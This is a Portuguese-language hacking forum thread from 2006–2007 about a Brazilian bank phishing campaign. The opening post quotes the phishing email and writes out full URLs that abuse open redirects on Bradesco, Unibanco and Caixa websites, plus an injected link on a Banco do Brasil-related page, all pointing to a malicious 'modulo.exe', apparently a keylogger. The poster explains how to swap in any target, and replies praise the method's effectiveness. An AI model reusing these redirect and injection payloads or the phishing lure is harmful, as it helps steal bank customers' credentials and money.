Text only | Text with Images

FORUM DARKERS

Segurança & Hacking => Penetration Tests => SEing => Topic started by: kmrafa on 22 de December , 2006, 04:11:56 PM

Title: Falha em sites de bancos
Post by: kmrafa on 22 de December , 2006, 04:11:56 PM
Ae pessoal,

Não é muita boa, mais os links que acharam, até a pessoa aprendeu a olhar para baixo e ver o link que aparece..mais com esse ai..

Achei uma falha graves dos sites de banco.

Eis o e-mail:

"Olá,

A FEBRABAN (Federação Brasileira de Bancos) está disponibilizando a todos clientes Internet Bankline, um módulo de segurança anti-fraudes on-line no intuito de proteger a integridade do usuário. Para fazer o download do módulo clique no link do seu respectivo banco abaixo:


* Banco Bradesco

* Unibanco

* Banco do Brasil

* Banco Itau

* Caixa Economica Federal


* Outros Bancos"

até ai tudo bem..mais reparem aonde os links apontam, e que nao eh aqueles "cjb" da vida..

* Banco Bradesco ->aponta para: http://institucional.bradesco.com.br/po ... modulo.exe (http://institucional.bradesco.com.br/pop_site_externo/redirect.asp?paramPag=_&site=http://www.digitalmundo.cl/foro/data/.../modulo.exe)


* Unibanco -> http://www.unibanco.com.br/popup/ubb/po ... modulo.exe (http://www.unibanco.com.br/popup/ubb/popup.asp?url=http://www.digitalmundo.cl/foro/data/.../modulo.exe)

* Banco do Brasil -> https://www2.realsecureweb.com.br/scrip ... 3o%3C/a%3E (https://www2.realsecureweb.com.br/scripts/engine_brpi.dll/DYN475038?OPERA=LogoutB&CLIENTE=Aten%E7%E3o%20Cliente.%20Acesse%20o%20link%20abaixo%20para%20baixar%20a%20nova%20atualiza%E7%E3o%3Cbr%3E%3Ca%20href=%22http://www.digitalmundo.cl/foro/data/.../modulo.exe%22%3ENova%20Atualiza%E7%E3o%3C/a%3E)

* Banco Itau -> http://institucional.bradesco.com.br/po ... modulo.exe (http://institucional.bradesco.com.br/pop_site_externo/redirect.asp?paramPag=_&site=http://www.digitalmundo.cl/foro/data/.../modulo.exe)

* Caixa Economica Federal ->  http://www1.caixa.gov.br/imprensa/_flas ... modulo.exe (http://www1.caixa.gov.br/imprensa/_flash/ban_Rede_Atendimento_166x49.swf?href=http://www.digitalmundo.cl/foro/data/.../modulo.exe)

E em todos eles aponta para um possivel KL é lógico.

No "outros bancos" aponta para qualquer um.

O resto já sabem, é só mudar depois do "=" na maioria das páginas.

Bom, gostaria de dizer que sou contra esse tipo de pratica, nao pratico apesar de ser MUITO tentador nunca fiz nada, e apenas a titulo de informação estou passando a vocês.

Se a administração achar inapropriado pode editar sem problemas.

E se for uma falha antiga já e todos sabem me desculpem pois faz tempo que estou afastado do hacking..rsrs..me perdoem se já foi postado isso.
Title: Re: Falha em sites de bancos
Post by: Ch1p5 on 22 de December , 2006, 04:57:16 PM
lol
isso tdo mundo cai
apesar d ter gente q naum confia em sites de banco on-line
vamo ver o q vai dar^^
gostei muito da forma q fizeram no bb e a caixa economica
atravez d link d suposta atualização e no sfw
flw kra
vou avisar pra minha mãe^^
Title: Re: Falha em sites de bancos
Post by: #phobia on 22 de December , 2006, 05:11:22 PM
lol

Achei bem interessante mesmo...
Apesar de muitos não acreditarem ou não mecherem com banco via internet, dessa forma aumenta muito as chances de alguém cair.

Flw!
Title: Re: Falha em sites de bancos
Post by: FreeMind on 22 de December , 2006, 05:48:06 PM
Interesante mesmo...
Creio que para usuario normal cair é difícil, mas tenho certeza de uma coisa...
O estrago é grando quando é enviado para empresas comerciais (por exemplo supermercados, lojas de médio porte,etc) pois elas sempre tem parceria com algum banco por causa de remessa de cheque, transferencia bancaria, etc e quase tudo hoje é feito via online. O funcionario dessas empresas médias não tem treinamento suficiente pois a empresa não tem recursos para isso e tmb não se preocupam em clicar em um link como esse (a insatisfação com o emprego  ou sálario ajuda tmb já vi muito disso hehehe)...
Title: Re: Falha em sites de bancos
Post by: java_aly on 13 de April , 2007, 04:57:02 PM
Muito massa !!!!

Apesar de quem acessa banco online andar muito
informada a respeito dessas coisas, é provavle
que de 10 usuarios 8 ainda caiam nesse skema!!!
Title: Re: Falha em sites de bancos
Post by: bironet on 14 de April , 2007, 01:14:25 AM
Sim é uma bastante tentadora, prentendo me especializar na área, claro que do lado bom da coisa. Tenho um conteúdo legal se possivel postarei para estudo. Verei antes as possibilidades.
Title: Re: Falha em sites de bancos
Post by: lcs on 14 de April , 2007, 04:21:56 PM
Talves alguns não saibam e não me perguntem como funciona pois não sei.

Numa empresa que trabalhei eles utilizavam o Bradesco como banco e na ocasião eles disponibilizaram um cd(podia ser tb disquete ou pen drive) com um programa para conexão segura com o site do bradesco e todos os seus serviços, ou  seja quando era necessario acessar o banco eles abriam esse cd e clicavam no link do banco, e faziam a conexão primeiro local, e depois remota alguem sabe alguma coisa disso.
Title: Re: Falha em sites de bancos
Post by: bironet on 14 de April , 2007, 04:41:17 PM
Hum  lá na empresa usa-se algo parecido, na realidade essa conexão local server como autenticação com o servidor de domínio do banco ( lá tambem utiliza bradesco) o que acontece apos autenticar-se o banco tem controle da máquina e serial do software que foi liberado, inclusive proibindo acesso simultâneo. Tipo um extranet com o servidor deles. É bem legal essa tecnologia.
Title: Re: Falha em sites de bancos
Post by: eb0x on 06 de September , 2007, 02:30:54 AM
O BB, tambem usa o mesmo sistema.
Porem nesse caso, apenas um keylloger, faz a festa e a conta da empresa fica na sua mao.
Cuidado com os menino de bota ...

format pro C
Text only | Text with Images